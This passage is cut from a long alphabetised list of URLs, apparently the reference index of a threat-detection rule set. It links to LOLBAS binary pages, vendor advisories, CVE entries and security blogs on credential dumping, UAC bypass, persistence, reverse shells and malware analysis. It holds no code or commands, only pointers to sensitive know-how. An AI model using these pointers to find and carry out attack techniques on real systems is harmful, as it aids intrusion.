ct.github.io/lolbas/Binaries/Pktmon/\nhttps://lolbas-project.github.io/lolbas/Binaries/Presentationhost/\nhttps://lolbas-project.github.io/lolbas/Binaries/Print/\nhttps://lolbas-project.github.io/lolbas/Binaries/PrintBrm/\nhttps://lolbas-project.github.io/lolbas/Binaries/Provlaunch/\nhttps://lolbas-project.github.io/lolbas/Binaries/Psr/\nhttps://lolbas-project.github.io/lolbas/Binaries/Rasautou/\nhttps://lolbas-project.github.io/lolbas/Bin
aries/Rdrleakdiag/\nhttps://lolbas-project.github.io/lolbas/Binaries/Regasm/\nhttps://lolbas-project.github.io/lolbas/Binaries/Regedit/\nhttps://lolbas-project.github.io/lolbas/Binaries/Regini/\nhttps://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/\nhttps://lolbas-project.github.io/lolbas/Binaries/Regsvcs/\nhttps://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\nhttps://lolbas-project.github.io/lolbas/Binaries/Replace/\nhttps://lolbas-project.github.io/lolbas/Binaries/Rpcping/\nhttps://lolbas-project.github.io/lolbas/Binaries/Rundll32\nhttps://lolbas-project.github.io/lolbas/Binaries/Runexehelper/\nhttps://lolbas-project.github.io/lolbas/Binaries/Runonce/\nhttps://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/\nhttps://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/\nhttps://lolbas-project.github.io/lolbas/Binaries/Setres/\nhttps://lolbas-project.github.io/lolbas/Binaries/Ssh/\nhttps://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nhttps://lolbas-project.github.io/lolbas/Binaries/Tar/\nhttps://lolbas-project.github.io/lolbas/Binaries/Teams/\nhttps://lolbas-project.github.io/lolbas/Binaries/Ttdinject/\nhttps://lolbas-project.github.io/lolbas/Binaries/Tttracer/\nhttps://lolbas-project.github.io/lolbas/Binaries/Unregmp2/\nhttps://lolbas-project.github.io/lolbas/Binaries/Vbc/\nhttps://lolbas-project.github.io/lolbas/Binaries/Verclsid/\nhttps://lolbas-project.github.io/lolbas/Binaries/Wbadmin/\nhttps://lolbas-project.github.io/lolbas/Binaries/Winget/\nhttps://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/\nhttps://lolbas-project.github.io/lolbas/Binaries/Wmic/\nhttps://lolbas-project.github.io/lolbas/Binaries/Wsreset\nhttps://lolbas-project.github.io/lolbas/Binaries/Wsreset/\nhttps://lolbas-project.github.io/lolbas/Binaries/Xwizard/\nhttps://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/\nhttps://lolbas-project.github.io/lolbas/Libraries/Desk/\nhttps://lolbas-project.github.io/lolbas/Lib
raries/Pcwutl/\nhttps://lolbas-project.github.io/lolbas/Libraries/Setupapi/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Track
er/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/\nhttps://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/\nhttps://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/\nhttps://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/\nhttps://lolbas-project.github.io/lolbas/Scripts/Manage-bde/\nhttps://lolbas-project.github.io/lolbas/Scripts/Pubprn/\nhttps://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/\nhttps://lolbas-project.github.io/lolbas/Scripts/Winrm/\nhttps://loldrivers.io/\nhttps://lots-project.com/site/2a2e617a75726566642e6e6574\nhttps://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html\nhttps://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/\nhttps://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/\nhttps://malpedia.caad.fkie.fraunhofer.de/actor/anthropoid_spider\nhttps://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset\nhttps://malware.guide/browser-hijacker/remove-onelaunch-virus/\nhttps://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170\nhttps://man.freebsd.org/cgi/man.cgi?pwd_mkdb\nhttps://man.openbsd.org/ssh_config#LocalCommand\nhttps://man.openbsd.org/ssh_config#ProxyCommand\nhttps://man7.org/linux/man-pages/man1/ncat.1.html\nhttps://man7.org/linux/man-pages/man1/passwd.1.html\nhttps://man7.org/linux/man-pages/man2/mknod.2.html\nhttps://man7.org/linux/man-pages/man7/bpf-helpers.7.html\nhttps://man7.org/linux/man-pages/man8/getcap.8.html\nhttps://man7.org/linux/man-pages/man8/kmod.8.html\nhttps://man7.org/linux/man-pages/man8/ld.so.8.html\
nhttps://mango.pdf.zone/stealing-chrome-cookies-without-a-password\nhttps://manpages.debian.org/unstable/ecasound/ecasound.1.en.html\nhttps://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b\nhttps://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\nhttps://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF\nhttps://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF\nhttps://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nhttps://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf\nhttps://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf\nhttps://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072\nhttps://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf\nhttps://medium.com/@blueteamops/shimcache-flush-89daff28d15e\nhttps://medium.com/@boutnaru/the-windows-foreniscs-journey-run-mru-run-dialog-box-most-recently-used-57375a02d724\nhttps://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4\nhttps://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac\nhttps://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01\nhttps://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83\nhttps://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6\nhttps://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332\nhttps://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d\nhttps://m
edium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961\nhttps://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1\nhttps://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf\nhttps://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a\nhttps://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf\nhttps://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45\nhttps://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6\nhttps://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b\nhttps://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f\nhttps://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e\nhttps://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36\nhttps://medium.com/@petehouston/upload-files-with-curl-93064dcccc76\nhttps://medium.com/@redfanatic7/running-kali-linux-on-windows-51ad95166e6e\nhttps://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983\nhttps://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191\nhttps://medium.com/@seifeddinerajhi/kubernetes-rbac-privilege-escalation-exploits-and-mitigations-26c07629eeab\nhttps://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1\nhttps://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71\nhttps://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae\nhttps://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213d
fdf\nhttps://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c\nhttps://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf\nhttps://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6\nhttps://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035\nhttps://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1\nhttps://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63\nhttps://medium.com/r3d-buck3t/red-teaming-in-cloud-leverage-azure-frontdoor-cdn-for-c2-redirectors-79dd9ca98178\nhttps://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3\nhttps://medium.com/system-weakness/detecting-as-rep-roasting-attacks-b5b3965f9714\nhttps://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\nhttps://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e\nhttps://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16\nhttps://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997\nhttps://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926\nhttps://mez0.cc/posts/cobaltstrike-powershell-exec/\nhttps://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html\nhttps://mgreen27.github.io/posts/2019/05/12/BinaryRename.html\nhttps://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html\nhttps://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0\nhttps://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462\nhttps://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/container%20service%20account/\nhttps://microsoft.github.io/Threat-Matrix-for-Kubernetes/techni
ques/Data%20destruction/\nhttps://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/\nhttps://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/\nhttps://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Sidecar%20Injection/\nhttps://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Writable%20hostPath%20mount/\nhttps://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/\nhttps://mn3m.info/posts/suid-vs-capabilities/\nhttps://mobile.twitter.com/0gtweet/status/1564131230941122561\nhttps://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/\nhttps://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw\nhttps://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186\nhttps://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local\nhttps://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass\nhttps://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22\nhttps://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/\nhttps://mrd0x.com/sentinelone-persistence-via-menu-context/\nhttps://mrd0x.com/stealing-tokens-from-office-applications/\nhttps://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx\nhttps://msdn.microsoft.com/en-us/library/cc220234.aspx\nhttps://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest\nhttps://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\nhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444\nhttps://msrc.microsoft.com/update-guide/vulnerability/ADV170021\nhttps://msrc.microsoft.com/update-guide/vulnerability/ADV210003\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\nhttps://
msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190\nhttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120\nhttps://my.f5.com/manage/s/article/K589\nhttps://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90\nhttps://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3\nhttps://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea\nhttps://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845\nhttps://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08\nhttps://networkraptor.blogspot.com/2015/01/user-agent-strings.html\nhttps://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/\nhttps://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/\nhttps://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/\nhttps://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/\nhttps://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/\nhttps://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/\nhttps://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/\nhttps://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728\nhtt
ps://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/\nhttps://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/\nhttps://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/\nhttps://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-a-technical-deep-dive\nhttps://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/\nhttps://ngrok.com/\nhttps://ngrok.com/docs\nhttps://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent\nhttps://nmap.org/\nhttps://nmap.org/ncat/\nhttps://nodejs.org/api/cli.html\nhttps://nored0x.github.io/red-teaming/office-persistence/#what-is-a-wll-file\nhttps://notebook.community/Cyb3rWard0g/HELK/docker/helk-jupyter/notebooks/sigma/proxy_ursnif_malware\nhttps://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/\nhttps://nsudo.m2team.org/en-us/\nhttps://nullsec.us/windows-event-log-audit-cve/\nhttps://nvd.nist.gov/vuln/detail/cve-2021-1675\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-26084\nhttps://nvd.nist.gov/vuln/detail/cve-2021-34527\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-41773\nhttps://nvd.nist.gov/vuln/detail/CVE-2023-2283\nhttps://nvd.nist.gov/vuln/detail/CVE-2024-3400\nhttps://nvd.nist.gov/vuln/detail/CVE-2025-2825\nhttps://nvd.nist.gov/vuln/detail/CVE-2025-30406\nhttps://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\nhttps://nwgat.ninja/getting-system-information-with-wmic-on-windows/\nhttps://nxlog.co/documentation/nxlog-user-guide/applocker.html\nhttps://o365blog.com/aadinternals/\nhttps://o365blog.com/post/aadbackdoor/\nhttps://o365blog.com/post/adfs/\nhttps://o365blog.com/post/hybridhealthagent/\nhttps://objective-see.org/blog/blog_0x1E.html\nhttps://objective-see.org/blog/blog_0x4B.html\nhttps://objective-see.org/blog/blog_0x62.html\nhttps://objective-see.org/blog/blog_0x68.html\nhttps://objective-see.org/blog/blog_0x6D.html\nhttps://oddvar.moe
/2017/05/18/bypassing-application-whitelisting-with-bginfo/\nhttps://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/\nhttps://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/\nhttps://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/\nhttps://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\nhttps://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/\nhttps://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/\nhttps://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\nhttps://old.zeek.org/zeekweek2019/slides/bzar.pdf\nhttps://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/\nhttps://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow\nhttps://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\nhttps://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/\nhttps://owasp.org/www-community/vulnerabilities/Expression_Language_Injection\nhttps://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing\nhttps://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf\nhttps://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html\nhttps://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html\nhttps://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/\nhttps://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/\nhttps://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg\nhttps://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large\nhttps://pentest.blog/windows-privilege-escalation-methods-for-pentesters/\nhttps://pentester.land/tutori
als/2018/10/25/source-code-disclosure-via-exposed-git-folder.html\nhttps://pentestlab.blog/2017/03/30/weak-service-permissions/\nhttps://pentestlab.blog/2017/03/31/insecure-registry-permissions/\nhttps://pentestlab.blog/2017/04/13/hot-potato/\nhttps://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/\nhttps://pentestlab.blog/2018/05/15/lateral-movement-winrm/\nhttps://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/\nhttps://pentestlab.blog/2019/10/21/persistence-security-support-provider/\nhttps://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/\nhttps://pentestlab.blog/2020/01/22/persistence-modify-existing-service/\nhttps://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/\nhttps://pentestlab.blog/2020/02/24/parent-pid-spoofing/\nhttps://pentestlab.blog/2020/07/06/indirect-command-execution/\nhttps://pentestlab.blog/2022/02/14/persistence-notepad-plugins/\nhttps://pentestlab.blog/tag/ntds-dit/\nhttps://pentestlab.blog/tag/sharpmove/\nhttps://pentestlab.blog/tag/svchost/\nhttps://pentestlaboratories.com/2021/12/08/process-ghosting/\nhttps://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\nhttps://perishablepress.com/blacklist/ua-2013.txt\nhttps://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor\nhttps://persistence-info.github.io/Data/aedebug.html\nhttps://persistence-info.github.io/Data/amsi.html\nhttps://persistence-info.github.io/Data/autodialdll.html\nhttps://persistence-info.github.io/Data/codesigning.html\nhttps://persistence-info.github.io/Data/diskcleanuphandler.html\nhttps://persistence-info.github.io/Data/hhctrl.html\nhttps://persistence-info.github.io/Data/htmlhelpauthor.html\nhttps://persistence-info.github.io/Data/ifilters.html\nhttps://persistence-info.github.io/Data/lsaaextension.html\nhttps://persistence-info.github.io/Data/mpnotify.html\nhttps://persistence-info.github.io/Data/naturallanguage6.html\nhttps://persistence-info.github.io/Data/powershellprofile.html\nhttps://persistence-info
.github.io/Data/recyclebin.html\nhttps://persistence-info.github.io/Data/userinitmprlogonscript.html\nhttps://persistence-info.github.io/Data/wer_debugger.html\nhttps://persistence-info.github.io/Data/windowsterminalprofile.html\nhttps://persistence-info.github.io/Data/wpbbin.html\nhttps://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1\nhttps://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472\nhttps://portmap.io/\nhttps://portswigger.net/web-security/cross-site-scripting/contexts\nhttps://positive.security/blog/ms-officecmd-rce\nhttps://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs\nhttps://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5\nhttps://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843\nhttps://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404\nhttps://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb\nhttps://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0\nhttps://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec\nhttps://posts.specterops.io/covenant-v0-5-eee0507b85ba\nhttps://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462\nhttps://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\nhttps://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922\nhttps://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab9
92\nhttps://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\nhttps://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124\nhttps://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e\nhttps://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f\nhttps://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30\nhttps://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650\nhttps://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/\nhttps://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/\nhttps://powersploit.readthedocs.io/en/stable/Recon/README\nhttps://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2\nhttps://processhacker.sourceforge.io/\nhttps://projectdiscovery.io/blog/crushftp-authentication-bypass\nhttps://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf\nhttps://pub-7cb8ac806c1b4c4383e585c474a24719.r2.dev/116309e7121bc8b0e66e4166c06f7b818e1d3629.pdf\nhttps://pypi.org/project/scapy/\nhttps://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more\nhttps://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html\nhttps://rastamouse.me/ntlm-relaying-via-cobalt-strike/\nhttps://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf\nhttps://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf\nhttps://rclone.org/\nhttps://reaqta.com/2017/11/short-journey-darkvnc/\nhttps://reaqta.com/2017/12/mavinject-microsoft-injector/\nhttps://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/\nhttps://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/\nhttps://redcanary.com/blog/applescript/\nhttps://redcanary.com/blog/blackbyte-ransomware/\nhttps://redcanary.com/blog/blackbyte-ransomware/?utm_
source=twitter&utm_medium=social\nhttps://redcanary.com/blog/blue-mockingbird-cryptominer/\nhttps://redcanary.com/blog/child-processes/\nhttps://redcanary.com/blog/chromeloader/\nhttps://redcanary.com/blog/clipping-silver-sparrows-wings/\nhttps://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/\nhttps://redcanary.com/blog/ebpf-malware/\nhttps://redcanary.com/blog/email-forwarding-rules/\nhttps://redcanary.com/blog/gootloader/\nhttps://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/\nhttps://redcanary.com/blog/intelligence-insights-april-2022/\nhttps://redcanary.com/blog/intelligence-insights-december-2021\nhttps://redcanary.com/blog/intelligence-insights-november-2021/\nhttps://redcanary.com/blog/intelligence-insights-october-2021/\nhttps://redcanary.com/blog/lateral-movement-winrm-wmi/\nhttps://redcanary.com/blog/mac-application-bundles/\nhttps://redcanary.com/blog/misbehaving-rats/\nhttps://redcanary.com/blog/msix-installers/\nhttps://redcanary.com/blog/raspberry-robin/\nhttps://redcanary.com/blog/rclone-mega-extortion/\nhttps://redcanary.com/blog/right-to-left-override/\nhttps://redcanary.com/blog/yellow-cockatoo/\nhttps://redcanary.com/threat-detection-report/\nhttps://redcanary.com/threat-detection-report/threats/cobalt-strike/\nhttps://redcanary.com/threat-detection-report/threats/dridex/\nhttps://redcanary.com/threat-detection-report/threats/qbot/\nhttps://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish\nhttps://redmimicry.com\nhttps://redmimicry.com/posts/redmimicry-winnti/\nhttps://redmimicry.com/posts/redmimicry-winnti/#dropper\nhttps://regex101.com/r/RugQYK/1\nhttps://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_U